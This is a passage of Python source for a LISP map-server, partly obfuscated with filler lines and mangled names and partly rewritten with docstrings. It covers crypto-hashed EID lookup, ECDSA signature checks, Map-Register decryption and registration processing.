if 96 - 96: oO0o . ooOoO0o * Oo0Ooo % ooOoO0o + I1Ii111 + iIii1I11I1II1
if 45 - 45: II111iiii
def lisp_get_eid_hash(eid):
    """
    Return the crypto-hash portion of `eid` as a colon-separated hex
    string, or None when the EID falls under no configured prefix in
    lisp_eid_hashes. The hash occupies the low (128 - mask_len) bits.

    NOTE(review): Python 2 specific — hex(x)[2:-1] assumes the address
    is a long (strips "0x" and the trailing "L"); confirm eid.address
    is always a long here.
    """
    hash_bits = None
    for prefix in lisp_eid_hashes:
        # A wildcard instance-id (-1) matches the EID's own IID; the
        # stored value is restored after the comparison.
        saved_iid = prefix.instance_id
        if saved_iid == -1:
            prefix.instance_id = eid.instance_id

        more_specific = eid.is_more_specific(prefix)
        prefix.instance_id = saved_iid
        if more_specific:
            hash_bits = 128 - prefix.mask_len
            break

    if hash_bits == None:
        return None

    # Emit 16-bit quads low-to-high, prepending so the string reads
    # high-to-low, then a final 8-bit group for a ragged bit count.
    addr = eid.address
    out = ""
    for _ in range(0, hash_bits / 16):
        quad = addr & 0xffff
        quad = hex(quad)[2:-1]
        out = quad.zfill(4) + ":" + out
        addr >>= 16

    if hash_bits % 16 != 0:
        octet = addr & 0xff
        octet = hex(octet)[2:-1]
        out = octet.zfill(2) + ":" + out

    return out[0:-1]
if 80 - 80: OoooooooOO % iII111i * IiII % IiII
if 34 - 34: OoO0O00
if 22 - 22: OOooOOo
if 23 - 23: I1ii11iIi11i
if 53 - 53: I11i
if 64 - 64: iIii1I11I1II1 + O0 % IiII
if 13 - 13: i11iIiiIii
if 49 - 49: OoOoOO00
if 61 - 61: I1Ii111 / I1Ii111 / iII111i / ooOoO0o - I1IiiI . o0oOOo0O0Ooo
if 80 - 80: I1IiiI - OOooOOo . oO0o
if 75 - 75: oO0o + OoOoOO00 - OoooooooOO
def lisp_lookup_public_key(eid):
    """
    Look up the public key registered for a crypto-hashed EID.

    Returns a 3-element list [hash_eid, public_key, lookup_ok]:
    [None, None, False] when no hash can be extracted from `eid`,
    [hash_eid, None, False] when the site lookup or JSON parse fails,
    and [hash_eid, key_or_None, True] on a successful lookup.
    """
    iid = eid.instance_id

    # Build the distinguished-name EID "hash-<hex>" to look up.
    eid_hash = lisp_get_eid_hash(eid)
    if eid_hash == None:
        return [None, None, False]

    eid_hash = "hash-" + eid_hash
    hash_eid = lisp_address(LISP_AFI_NAME, eid_hash, len(eid_hash), iid)
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)

    site_eid = lisp_site_eid_lookup(hash_eid, group, True)
    if site_eid == None:
        return [hash_eid, None, False]

    # Scan registered RLOCs for a JSON payload carrying "public-key".
    pubkey = None
    for rloc_entry in site_eid.registered_rlocs:
        payload = rloc_entry.json
        if payload == None:
            continue
        try:
            payload = json.loads(payload.json_string)
        except:
            lprint("Registered RLOC JSON format is invalid for {}".format(
                eid_hash))
            return [hash_eid, None, False]

        if "public-key" not in payload:
            continue
        pubkey = payload["public-key"]
        break

    return [hash_eid, pubkey, True]
if 41 - 41: i1IIi / oO0o % OoooooooOO * OOooOOo + I1ii11iIi11i
if 56 - 56: OOooOOo * OOooOOo / o0oOOo0O0Ooo
if 4 - 4: OoOoOO00 / OoO0O00
if 66 - 66: I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . i11iIiiIii - OoooooooOO
if 92 - 92: O0 - i11iIiiIii + OoO0O00 - OoooooooOO - o0oOOo0O0Ooo
if 25 - 25: oO0o / oO0o / Ii1I / O0
if 56 - 56: ooOoO0o
def lisp_verify_cga_sig ( eid , rloc_record ) :
 """
 Verify the ECDSA signature carried in a registration RLOC-record
 against the public key registered for the crypto-hashed EID.
 Returns True when the signature verifies, False on any failure
 (missing signature-eid, unknown hash, missing/bad public key, bad
 base64, odd-length signature, PEM parse failure, or verify failure).
 NOTE: the "if N - N:" lines throughout are no-op filler left by the
 obfuscator and are kept verbatim.
 """
 if 19 - 19: O0 * I1IiiI + I1ii11iIi11i
 if 25 - 25: I11i - ooOoO0o / OoO0O00 / iII111i - OoO0O00
 if 86 - 86: OoO0O00
 if 89 - 89: OoooooooOO % iII111i * I1ii11iIi11i + I1ii11iIi11i . Oo0Ooo
 if 4 - 4: I11i
 # The RLOC-record carries a JSON blob; it holds the "signature" (and
 # possibly a "signature-eid") fields used below.
 o00 = json . loads ( rloc_record . json . json_string )
 if 8 - 8: IiII
 # Choose the signature-EID: the EID itself when it embeds a crypto
 # hash, else the explicit "signature-eid" JSON field.
 # NOTE(review): dict.has_key() is Python-2 only.
 if ( lisp_get_eid_hash ( eid ) ) :
  O000oOO0Oooo = eid
 elif ( o00 . has_key ( "signature-eid" ) ) :
  i11 = o00 [ "signature-eid" ]
  O000oOO0Oooo = lisp_address ( LISP_AFI_IPV6 , i11 , 0 , 0 )
 else :
  lprint ( " No signature-eid found in RLOC-record" )
  return ( False )
 if 4 - 4: iIii1I11I1II1 % I1IiiI - OoooooooOO / iII111i
 if 55 - 55: O0 + iII111i * OoOoOO00 . i11iIiiIii * Ii1I + oO0o
 if 66 - 66: i1IIi . I1ii11iIi11i
 if 86 - 86: Oo0Ooo
 if 48 - 48: OoO0O00
 # Look up the public key registered for the signature-EID's hash.
 oO00oO0OOoooO , OO0o0OOO0ooOO00o , OO0oo00Oo0ooO = lisp_lookup_public_key ( O000oOO0Oooo )
 if ( oO00oO0OOoooO == None ) :
  I11i11i1 = green ( O000oOO0Oooo . print_address ( ) , False )
  lprint ( " Could not parse hash in EID {}" . format ( I11i11i1 ) )
  return ( False )
 if 49 - 49: I1ii11iIi11i - II111iiii % I1IiiI
 if 24 - 24: ooOoO0o
 OOo00oO0oo = "found" if OO0oo00Oo0ooO else bold ( "not found" , False )
 I11i11i1 = green ( oO00oO0OOoooO . print_address ( ) , False )
 lprint ( " Lookup for crypto-hashed EID {} {}" . format ( I11i11i1 , OOo00oO0oo ) )
 if ( OO0oo00Oo0ooO == False ) : return ( False )
 if 27 - 27: Oo0Ooo
 if ( OO0o0OOO0ooOO00o == None ) :
  lprint ( " RLOC-record with public-key not found" )
  return ( False )
 if 85 - 85: iIii1I11I1II1 . o0oOOo0O0Ooo + oO0o
 if 79 - 79: O0 - iIii1I11I1II1 + i1IIi . I11i
 # Log an abbreviated form of the public key (first and last 8 chars).
 ii111 = OO0o0OOO0ooOO00o [ 0 : 8 ] + "..." + OO0o0OOO0ooOO00o [ - 8 : : ]
 lprint ( " RLOC-record with public-key '{}' found" . format ( ii111 ) )
 if 4 - 4: oO0o / OoO0O00
 if 90 - 90: I11i . IiII / OoO0O00 . IiII
 if 62 - 62: i11iIiiIii * I11i + oO0o - i1IIi
 if 9 - 9: I1IiiI
 if 17 - 17: II111iiii + i11iIiiIii + IiII
 # Base64-decode the signature string from the JSON.
 iIIiii = o00 [ "signature" ]
 if 2 - 2: I11i + I1IiiI . IiII . OoOoOO00 * oO0o - ooOoO0o
 try :
  o00 = binascii . a2b_base64 ( iIIiii )
 except :
  lprint ( " Incorrect padding in signature string" )
  return ( False )
 if 29 - 29: OoO0O00
 if 78 - 78: iII111i * ooOoO0o + O0 % ooOoO0o + OoO0O00
 # An odd-length signature cannot be a valid r||s pair; reject early.
 IiIOoo = len ( o00 )
 if ( IiIOoo & 1 ) :
  lprint ( " Signature length is odd, length {}" . format ( IiIOoo ) )
  return ( False )
 if 76 - 76: IiII % I1IiiI * Ii1I / Ii1I / OoooooooOO + Ii1I
 if 19 - 19: OoooooooOO
 if 88 - 88: I1IiiI % ooOoO0o % Oo0Ooo - O0
 if 71 - 71: OOooOOo % Ii1I - i11iIiiIii - oO0o . ooOoO0o / I1Ii111
 if 53 - 53: iII111i . Oo0Ooo
 # The data that was signed is the printed signature-EID address.
 oO0o0O00O00O = O000oOO0Oooo . print_address ( )
 if 91 - 91: oO0o * OoooooooOO * oO0o % oO0o * II111iiii % I1Ii111
 if 8 - 8: Ii1I
 if 28 - 28: iII111i / I1ii11iIi11i - OoOoOO00 * Oo0Ooo + Ii1I * OoOoOO00
 if 94 - 94: oO0o
 # The registered public key is base64'd PEM; build a verifying key.
 OO0o0OOO0ooOO00o = binascii . a2b_base64 ( OO0o0OOO0ooOO00o )
 try :
  ii1i1I1111ii = ecdsa . VerifyingKey . from_pem ( OO0o0OOO0ooOO00o )
 except :
  o0Oo0o0ooOOO = bold ( "Bad public-key" , False )
  lprint ( " {}, not in PEM format" . format ( o0Oo0o0ooOOO ) )
  return ( False )
 if 49 - 49: OOooOOo - iIii1I11I1II1 / ooOoO0o
 if 28 - 28: OoOoOO00 + OoOoOO00 - OoOoOO00 / ooOoO0o
 if 81 - 81: oO0o
 if 34 - 34: o0oOOo0O0Ooo * OOooOOo - i1IIi * o0oOOo0O0Ooo * Oo0Ooo
 if 59 - 59: iIii1I11I1II1 / Oo0Ooo % II111iiii
 if 55 - 55: ooOoO0o - IiII + o0oOOo0O0Ooo
 if 48 - 48: O0 - iIii1I11I1II1 * OOooOOo
 if 33 - 33: I11i
 if 63 - 63: Ii1I % II111iiii / OoOoOO00 + Oo0Ooo
 if 28 - 28: OoO0O00 + I1IiiI . oO0o + II111iiii - O0
 if 32 - 32: oO0o
 # Verify the decoded signature over the address string using SHA-256.
 # ecdsa raises on a bad signature, hence the broad except.
 try :
  IIIiiI1I = ii1i1I1111ii . verify ( o00 , oO0o0O00O00O , hashfunc = hashlib . sha256 )
 except :
  lprint ( " Signature library failed for signature data '{}'" . format ( oO0o0O00O00O ) )
  if 62 - 62: i11iIiiIii + OoooooooOO + IiII - OoO0O00 / oO0o * iIii1I11I1II1
  lprint ( " Signature used '{}'" . format ( iIIiii ) )
  return ( False )
 if 91 - 91: o0oOOo0O0Ooo - i11iIiiIii + Oo0Ooo % iIii1I11I1II1
 return ( IIIiiI1I )
if 58 - 58: iII111i / ooOoO0o - I1Ii111 + I1Ii111 * ooOoO0o
if 48 - 48: iII111i % O0 % Ii1I * OoO0O00 . OoO0O00
if 74 - 74: OoO0O00 * i1IIi + I1ii11iIi11i / o0oOOo0O0Ooo / i1IIi
if 94 - 94: Ii1I
if 13 - 13: OoO0O00 - II111iiii . iII111i + OoOoOO00 / i11iIiiIii
if 32 - 32: ooOoO0o / II111iiii / I1ii11iIi11i
if 34 - 34: iIii1I11I1II1
if 47 - 47: OOooOOo * iII111i
if 71 - 71: IiII - OoooooooOO * i11iIiiIii . OoooooooOO % i1IIi . Oo0Ooo
if 3 - 3: OoO0O00 + i11iIiiIii + oO0o * IiII
def lisp_remove_eid_from_map_notify_queue(eid_list):
    """
    Drop every queued Map-Notify retransmission that covers one of the
    supplied EIDs. For each matching queue entry the retransmit timer is
    cancelled (when one is running) and its nonce key is remembered; the
    collected keys are popped after the scan so the queue dictionary is
    not mutated while being iterated.
    """
    keys_to_dequeue = []
    for eid in eid_list:
        for nonce_key in lisp_map_notify_queue:
            map_notify = lisp_map_notify_queue[nonce_key]
            if eid not in map_notify.eid_list:
                continue

            keys_to_dequeue.append(nonce_key)
            timer = map_notify.retransmit_timer
            if timer:
                timer.cancel()

            lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".format(
                map_notify.nonce_key, green(eid, False)))

    for nonce_key in keys_to_dequeue:
        lisp_map_notify_queue.pop(nonce_key)
    return
if 93 - 93: i1IIi - I1IiiI * i11iIiiIii / Ii1I . Ii1I - i1IIi
if 19 - 19: iIii1I11I1II1 * OOooOOo * Oo0Ooo % I1IiiI
if 93 - 93: IiII % OoOoOO00 / I1IiiI + o0oOOo0O0Ooo * ooOoO0o / i1IIi
if 25 - 25: O0 / Oo0Ooo - o0oOOo0O0Ooo * Oo0Ooo
if 45 - 45: Ii1I * IiII - OOooOOo
if 57 - 57: iII111i % OoO0O00 / OoooooooOO
if 69 - 69: oO0o
if 44 - 44: IiII - II111iiii % Ii1I
def lisp_decrypt_map_register(packet):
    """
    Return the Map-Register 'packet' in cleartext. When the encryption
    bit in the first long-word of the header is clear, the packet is
    returned unchanged. When it is set, everything after the first 4
    header bytes is ChaCha-decrypted with the configured key for the
    key-id carried in the header; returns None if no such key exists.
    """
    first_long = socket.ntohl(struct.unpack("I", packet[0:4])[0])

    #
    # Encryption bit (bit 13 of the header) clear => already cleartext.
    #
    if ((first_long >> 13) & 0x1) == 0:
        return (packet)

    key_id = (first_long >> 14) & 0x7

    #
    # Look up the decryption key; zero-fill to the 32 bytes ChaCha
    # expects and use an all-zero 8-byte nonce.
    #
    try:
        decrypt_key = lisp_ms_encryption_keys[key_id].zfill(32)
        nonce = "0" * 8
    except:
        lprint("Cannot decrypt Map-Register with key-id {}".format(key_id))
        return (None)

    lprint("{} Map-Register with key-id {}".format(bold("Decrypt", False),
        key_id))

    #
    # The 4-byte header stays cleartext; only the remainder is encrypted.
    #
    plaintext = chacha.ChaCha(decrypt_key, nonce).decrypt(packet[4::])
    return (packet[0:4] + plaintext)
if 46 - 46: O0 - iIii1I11I1II1 . OoooooooOO . oO0o
if 51 - 51: I1Ii111 - o0oOOo0O0Ooo
if 5 - 5: O0
if 7 - 7: OoOoOO00 + OoO0O00 * I1IiiI
if 63 - 63: I1ii11iIi11i + iII111i * i1IIi
if 63 - 63: I1ii11iIi11i / II111iiii % oO0o + ooOoO0o . Ii1I % I11i
if 59 - 59: I1Ii111 % o0oOOo0O0Ooo - I1IiiI * i1IIi
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
 """
 Map-Server processing of a received Map-Register: decrypt if needed,
 decode the header, then for each EID-record find the matching site,
 authenticate, optionally verify the EID-crypto-hash signature, store
 the registered RLOC-set, and send Map-Notify messages as requested.

 lisp_sockets: sockets used to send Map-Notify replies.
 packet: raw Map-Register payload.
 source: address object of the registering xTR.
 sport: UDP source port of the registration.
 NOTE: the "if N - N:" lines are no-op obfuscator filler, kept verbatim.
 """
 global lisp_registered_count
 if 5 - 5: I1IiiI
 if 22 - 22: II111iiii / iII111i
 if 18 - 18: i11iIiiIii * ooOoO0o . I1IiiI + i1IIi + I11i
 if 62 - 62: O0 % o0oOOo0O0Ooo + iIii1I11I1II1 + iIii1I11I1II1 * ooOoO0o
 if 21 - 21: o0oOOo0O0Ooo % O0
 if 81 - 81: i1IIi + i1IIi
 # Decrypt when the encryption bit is set; a failed decrypt (no key
 # configured) drops the packet.
 packet = lisp_decrypt_map_register ( packet )
 if ( packet == None ) : return
 if 3 - 3: I1Ii111 . I1ii11iIi11i * iII111i * i11iIiiIii * IiII
 oo0Oo0oOo0 = lisp_map_register ( )
 OO0o0 , packet = oo0Oo0oOo0 . decode ( packet )
 if ( packet == None ) :
  lprint ( "Could not decode Map-Register packet" )
  return
 if 47 - 47: iIii1I11I1II1 . OoO0O00 . iIii1I11I1II1
 oo0Oo0oOo0 . sport = sport
 if 57 - 57: IiII * ooOoO0o * ooOoO0o * iIii1I11I1II1 * I1Ii111 + OoOoOO00
 oo0Oo0oOo0 . print_map_register ( )
 if 83 - 83: OoOoOO00 . Oo0Ooo . OoO0O00
 if 65 - 65: iII111i * iIii1I11I1II1
 if 48 - 48: iII111i * OoO0O00
 if 57 - 57: ooOoO0o + I1IiiI
 # Remember which auth algorithm was used: True for SHA1-160, False
 # when the alg-id says SHA-256-128.
 iII111 = True
 if ( oo0Oo0oOo0 . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
  iII111 = True
 if 23 - 23: Oo0Ooo + i11iIiiIii * ooOoO0o % OOooOOo - I11i
 if ( oo0Oo0oOo0 . alg_id == LISP_SHA_256_128_ALG_ID ) :
  iII111 = False
 if 4 - 4: IiII % Oo0Ooo
 if 65 - 65: OoO0O00
 if 65 - 65: oO0o
 if 77 - 77: I11i * i1IIi - OOooOOo / OoOoOO00
 if 50 - 50: O0 - oO0o . oO0o
 # Accumulators across EID-records: merged (S,G) entries to notify,
 # the site of the last matched EID, the original record area, and the
 # list of EID tuples that registered.
 o0o00oo00O = [ ]
 if 98 - 98: OoooooooOO . o0oOOo0O0Ooo % OOooOOo / O0 + I1Ii111 % i11iIiiIii
 if 94 - 94: O0 + II111iiii - iII111i / i1IIi
 if 25 - 25: ooOoO0o . OoO0O00 - oO0o
 if 76 - 76: iIii1I11I1II1 / II111iiii * OoOoOO00 % iII111i . II111iiii + i11iIiiIii
 iIiOo0OOOOo = None
 oo0OO = packet
 ooOo000OOooo = [ ]
 o0oo0OoOo000 = oo0Oo0oOo0 . record_count
 # Walk each EID-record in the Map-Register.
 for IiIIi1IiiIiI in range ( o0oo0OoOo000 ) :
  iiI = lisp_eid_record ( )
  iIii1IiIiI = lisp_rloc_record ( )
  packet = iiI . decode ( packet )
  if ( packet == None ) :
   lprint ( "Could not decode EID-record in Map-Register packet" )
   return
  if 45 - 45: I1Ii111 / I1IiiI + Ii1I / iII111i / Ii1I + I1Ii111
  iiI . print_record ( " " , False )
  if 12 - 12: Oo0Ooo . i1IIi + iIii1I11I1II1 % I1ii11iIi11i
  if 33 - 33: oO0o . oO0o / IiII + II111iiii
  if 34 - 34: OoO0O00 . OoOoOO00 / i1IIi / OOooOOo
  if 12 - 12: o0oOOo0O0Ooo . Oo0Ooo / II111iiii
  # Longest-match lookup of the registering prefix in the site cache.
  oO00Oooo0o0o0 = lisp_site_eid_lookup ( iiI . eid , iiI . group ,
   False )
  if 18 - 18: I1Ii111 % II111iiii + Ii1I * Oo0Ooo - OoooooooOO . Oo0Ooo
  i1iiii1 = oO00Oooo0o0o0 . print_eid_tuple ( ) if oO00Oooo0o0o0 else None
  if 66 - 66: O0
  if 68 - 68: oO0o / O0 % OoooooooOO
  if 58 - 58: iII111i / II111iiii - I11i * iIii1I11I1II1 % OoOoOO00
  if 14 - 14: iIii1I11I1II1 + oO0o / ooOoO0o
  if 20 - 20: I1ii11iIi11i . II111iiii % I1Ii111 + I1Ii111 / OoooooooOO . Ii1I
  if 98 - 98: OoooooooOO - i11iIiiIii - iII111i + Ii1I - I1IiiI
  if 75 - 75: OOooOOo
  # If the match does not accept more-specifics and the record is not
  # an exact match, fall back to the parent that does.
  if ( oO00Oooo0o0o0 and oO00Oooo0o0o0 . accept_more_specifics == False ) :
   if ( oO00Oooo0o0o0 . eid_record_matches ( iiI ) == False ) :
    i1II1 = oO00Oooo0o0o0 . parent_for_more_specifics
    if ( i1II1 ) : oO00Oooo0o0o0 = i1II1
  if 53 - 53: IiII / OoooooooOO / ooOoO0o + Oo0Ooo - OOooOOo - iIii1I11I1II1
  if 53 - 53: OOooOOo . I1IiiI . o0oOOo0O0Ooo / o0oOOo0O0Ooo
  if 40 - 40: OoooooooOO + iII111i % I1Ii111 . ooOoO0o
  if 2 - 2: ooOoO0o
  if 55 - 55: I11i + i1IIi * OoOoOO00 % Oo0Ooo * II111iiii . I1IiiI
  if 98 - 98: I1ii11iIi11i
  if 57 - 57: OOooOOo * I11i . oO0o
  if 17 - 17: iII111i - OOooOOo * I1IiiI + i1IIi % I1ii11iIi11i
  # Accept-more-specifics: create a dynamic child registration under
  # the matched parent; otherwise require an exact site-EID match.
  o0OOOooO = ( oO00Oooo0o0o0 and oO00Oooo0o0o0 . accept_more_specifics )
  if ( o0OOOooO ) :
   iiiIII1iIiI = lisp_site_eid ( oO00Oooo0o0o0 . site )
   iiiIII1iIiI . dynamic = True
   iiiIII1iIiI . eid . copy_address ( iiI . eid )
   iiiIII1iIiI . group . copy_address ( iiI . group )
   iiiIII1iIiI . parent_for_more_specifics = oO00Oooo0o0o0
   iiiIII1iIiI . add_cache ( )
   iiiIII1iIiI . inherit_from_ams_parent ( )
   oO00Oooo0o0o0 . more_specific_registrations . append ( iiiIII1iIiI )
   oO00Oooo0o0o0 = iiiIII1iIiI
  else :
   oO00Oooo0o0o0 = lisp_site_eid_lookup ( iiI . eid , iiI . group ,
    True )
  if 22 - 22: IiII - I1ii11iIi11i . ooOoO0o + I1ii11iIi11i
  if 37 - 37: oO0o
  I11i11i1 = iiI . print_eid_tuple ( )
  if 59 - 59: I11i
  # No site configured for this EID: skip past its RLOC-records.
  if ( oO00Oooo0o0o0 == None ) :
   i1i1IiIIIiI = bold ( "Site not found" , False )
   lprint ( " {} for EID {}{}" . format ( i1i1IiIIIiI , green ( I11i11i1 , False ) ,
    ", matched non-ams {}" . format ( green ( i1iiii1 , False ) if i1iiii1 else "" ) ) )
   if 61 - 61: IiII * I1Ii111 * OoO0O00 / oO0o - OoooooooOO
   if 5 - 5: o0oOOo0O0Ooo % OOooOOo % II111iiii
   if 86 - 86: O0 . ooOoO0o * OoooooooOO + Ii1I / I11i / II111iiii
   if 26 - 26: OoooooooOO - I1Ii111 / Oo0Ooo - iII111i % OoOoOO00 * OoooooooOO
   if 3 - 3: oO0o
   packet = iIii1IiIiI . end_of_rlocs ( packet , iiI . rloc_count )
   if ( packet == None ) :
    lprint ( " Could not decode RLOC-record in Map-Register packet" )
    return
   if 3 - 3: I1ii11iIi11i . IiII + ooOoO0o
   continue
  if 66 - 66: OOooOOo + oO0o - ooOoO0o / Ii1I * OoO0O00 * i11iIiiIii
  if 69 - 69: I11i % i11iIiiIii
  iIiOo0OOOOo = oO00Oooo0o0o0 . site
  if 34 - 34: Ii1I . OoooooooOO + II111iiii % oO0o
  if ( o0OOOooO ) :
   oOo = oO00Oooo0o0o0 . parent_for_more_specifics . print_eid_tuple ( )
   lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( oOo , False ) , iIiOo0OOOOo . site_name , green ( I11i11i1 , False ) ) )
   if 69 - 69: i11iIiiIii % I1IiiI * i11iIiiIii - OoO0O00 * iIii1I11I1II1
  else :
   oOo = green ( oO00Oooo0o0o0 . print_eid_tuple ( ) , False )
   lprint ( " Found {} for site '{}' for registering prefix {}" . format ( oOo , iIiOo0OOOOo . site_name , green ( I11i11i1 , False ) ) )
  if 70 - 70: I1Ii111 . OoOoOO00 % OoooooooOO + OoOoOO00 / II111iiii
  if 39 - 39: I1Ii111 * I1IiiI - o0oOOo0O0Ooo . oO0o . OOooOOo * i11iIiiIii
  if 70 - 70: OoOoOO00 / OOooOOo - o0oOOo0O0Ooo
  if 82 - 82: OOooOOo . i11iIiiIii . I1ii11iIi11i % OoOoOO00 * Ii1I / OoO0O00
  if 56 - 56: o0oOOo0O0Ooo / I1IiiI + I11i + I1IiiI
  if 34 - 34: Oo0Ooo / i11iIiiIii - ooOoO0o
  # Site administratively shut down: reject this record.
  if ( iIiOo0OOOOo . shutdown ) :
   lprint ( ( " Rejecting registration for site '{}', configured in " +
    "admin-shutdown state" ) . format ( iIiOo0OOOOo . site_name ) )
   packet = iIii1IiIiI . end_of_rlocs ( packet , iiI . rloc_count )
   continue
  if 77 - 77: OoOoOO00 * OoooooooOO
  if 41 - 41: iIii1I11I1II1 - O0 . II111iiii + I1IiiI - II111iiii / oO0o
  if 35 - 35: ooOoO0o - OoOoOO00 / iIii1I11I1II1 / OOooOOo
  if 38 - 38: i1IIi % OoooooooOO
  if 5 - 5: iIii1I11I1II1 + iIii1I11I1II1 . iIii1I11I1II1 + o0oOOo0O0Ooo
  if 45 - 45: I1IiiI - OoooooooOO - I1Ii111 - i1IIi - OoooooooOO * O0
  if 67 - 67: OoOoOO00 * o0oOOo0O0Ooo . IiII
  if 72 - 72: OoOoOO00 % OoooooooOO * O0
  # Authenticate the register against the site's key for this key-id
  # (empty password when the key-id is not configured).
  IIIiI1i = oo0Oo0oOo0 . key_id
  if ( iIiOo0OOOOo . auth_key . has_key ( IIIiI1i ) ) :
   IIii1 = iIiOo0OOOOo . auth_key [ IIIiI1i ]
  else :
   IIii1 = ""
  if 58 - 58: oO0o / ooOoO0o
  if 31 - 31: o0oOOo0O0Ooo % I11i - OoO0O00
  IIIIi1Iiii = lisp_verify_auth ( OO0o0 , oo0Oo0oOo0 . alg_id ,
   oo0Oo0oOo0 . auth_data , IIii1 )
  Oo0OooOoOO0O = "dynamic " if oO00Oooo0o0o0 . dynamic else ""
  if 7 - 7: o0oOOo0O0Ooo * I1Ii111 * o0oOOo0O0Ooo - OoO0O00 * Oo0Ooo - IiII
  oOo0ooOO0O = bold ( "passed" if IIIIi1Iiii else "failed" , False )
  IIIiI1i = "key-id {}" . format ( IIIiI1i ) if IIIiI1i == oo0Oo0oOo0 . key_id else "bad key-id {}" . format ( oo0Oo0oOo0 . key_id )
  if 10 - 10: i1IIi - OoOoOO00
  lprint ( " Authentication {} for {}EID-prefix {}, {}" . format ( oOo0ooOO0O , Oo0OooOoOO0O , green ( I11i11i1 , False ) , IIIiI1i ) )
  if 25 - 25: o0oOOo0O0Ooo . I1IiiI % iIii1I11I1II1 * Ii1I % I1IiiI * I11i
  if 21 - 21: O0 % II111iiii % OoOoOO00 / Ii1I * ooOoO0o
  if 82 - 82: I1IiiI % II111iiii * iIii1I11I1II1
  if 83 - 83: O0 + i1IIi
  if 47 - 47: iIii1I11I1II1 * i11iIiiIii % Ii1I + IiII
  if 39 - 39: i1IIi / i11iIiiIii % ooOoO0o - ooOoO0o % i1IIi
  # For crypto-hashed EIDs (or sites requiring signatures) verify the
  # CGA signature carried in the RLOC-set.
  oOII1ii11iI = True
  OoooOOo00oOO = ( lisp_get_eid_hash ( iiI . eid ) != None )
  if ( OoooOOo00oOO or oO00Oooo0o0o0 . require_signature ) :
   O0OOoooo0O0 = "Required " if oO00Oooo0o0o0 . require_signature else ""
   I11i11i1 = green ( I11i11i1 , False )
   oOo00O = lisp_find_sig_in_rloc_set ( packet , iiI . rloc_count )
   if ( oOo00O == None ) :
    oOII1ii11iI = False
    lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}, no signature found" ) . format ( O0OOoooo0O0 ,
    # IiII % ooOoO0o
    bold ( "failed" , False ) , I11i11i1 ) )
   else :
    oOII1ii11iI = lisp_verify_cga_sig ( iiI . eid , oOo00O )
    oOo0ooOO0O = bold ( "passed" if oOII1ii11iI else "failed" , False )
    lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}" ) . format ( O0OOoooo0O0 , oOo0ooOO0O , I11i11i1 ) )
  if 100 - 100: Oo0Ooo . oO0o - iII111i + OoooooooOO
  if 27 - 27: Oo0Ooo . I1Ii111 - i1IIi * I1IiiI
  if 96 - 96: I1ii11iIi11i - Ii1I . I1ii11iIi11i
  if 89 - 89: II111iiii % I1ii11iIi11i % IiII . I11i
  # Authentication or signature failure: skip this record's RLOCs.
  if ( IIIIi1Iiii == False or oOII1ii11iI == False ) :
   packet = iIii1IiIiI . end_of_rlocs ( packet , iiI . rloc_count )
   if ( packet == None ) :
    lprint ( " Could not decode RLOC-record in Map-Register packet" )
    return
   if 49 - 49: iII111i % i11iIiiIii * I11i - oO0o . OOooOOo . i11iIiiIii
   continue
  if 26 - 26: iIii1I11I1II1 + i11iIiiIii % iII111i + I1IiiI + oO0o - ooOoO0o
  if 4 - 4: Oo0Ooo - IiII - I11i
  if 72 - 72: OoooooooOO
  if 19 - 19: Oo0Ooo . OOooOOo
  if 58 - 58: IiII % iII111i + i1IIi % I1IiiI % OOooOOo . iII111i
  if 85 - 85: i11iIiiIii . o0oOOo0O0Ooo * iII111i . I1ii11iIi11i / I1Ii111 % Ii1I
  # Merge semantics: keep per-xTR "individual registrations" keyed by
  # source address + xtr-id under the parent site-EID.
  if ( oo0Oo0oOo0 . merge_register_requested ) :
   i1II1 = oO00Oooo0o0o0
   i1II1 . inconsistent_registration = False
   if 27 - 27: II111iiii . iIii1I11I1II1 / I1ii11iIi11i / i1IIi / iIii1I11I1II1
   if 70 - 70: i11iIiiIii . OoO0O00 / OoooooooOO * OoooooooOO - OOooOOo
   if 34 - 34: I1ii11iIi11i * i1IIi % OoooooooOO / I1IiiI
   if 39 - 39: OoO0O00 + IiII - II111iiii % I11i
   if 80 - 80: o0oOOo0O0Ooo * ooOoO0o
   if ( oO00Oooo0o0o0 . group . is_null ( ) ) :
    if ( i1II1 . site_id != oo0Oo0oOo0 . site_id ) :
     i1II1 . site_id = oo0Oo0oOo0 . site_id
     i1II1 . registered = False
     i1II1 . individual_registrations = { }
     i1II1 . registered_rlocs = [ ]
     lisp_registered_count -= 1
   if 87 - 87: I1Ii111 + O0 / I1ii11iIi11i / OoOoOO00 . Oo0Ooo - IiII
   if 24 - 24: OoOoOO00
   if 19 - 19: ooOoO0o
   ii1i1I1111ii = source . address + oo0Oo0oOo0 . xtr_id
   if ( oO00Oooo0o0o0 . individual_registrations . has_key ( ii1i1I1111ii ) ) :
    oO00Oooo0o0o0 = oO00Oooo0o0o0 . individual_registrations [ ii1i1I1111ii ]
   else :
    oO00Oooo0o0o0 = lisp_site_eid ( iIiOo0OOOOo )
    oO00Oooo0o0o0 . eid . copy_address ( i1II1 . eid )
    oO00Oooo0o0o0 . group . copy_address ( i1II1 . group )
    i1II1 . individual_registrations [ ii1i1I1111ii ] = oO00Oooo0o0o0
   if 43 - 43: O0 . I1Ii111 % OoooooooOO / I1IiiI . o0oOOo0O0Ooo - OoOoOO00
  else :
   oO00Oooo0o0o0 . inconsistent_registration = oO00Oooo0o0o0 . merge_register_requested
  if 46 - 46: I11i - OoooooooOO % o0oOOo0O0Ooo
  if 7 - 7: OoooooooOO - I1Ii111 * IiII
  if 20 - 20: o0oOOo0O0Ooo . OoooooooOO * I1IiiI . Oo0Ooo * OoOoOO00
  oO00Oooo0o0o0 . map_registers_received += 1
  if 3 - 3: I1Ii111 % i11iIiiIii % O0 % II111iiii
  if 8 - 8: OoooooooOO * ooOoO0o
  if 26 - 26: i11iIiiIii + oO0o - i1IIi
  if 71 - 71: I1IiiI % I1Ii111 / oO0o % oO0o / iIii1I11I1II1 + I1Ii111
  if 86 - 86: IiII % i1IIi * o0oOOo0O0Ooo - I1Ii111
  # Ignore a deregistration (TTL 0) from an RLOC that never registered.
  o0Oo0o0ooOOO = ( oO00Oooo0o0o0 . is_rloc_in_rloc_set ( source ) == False )
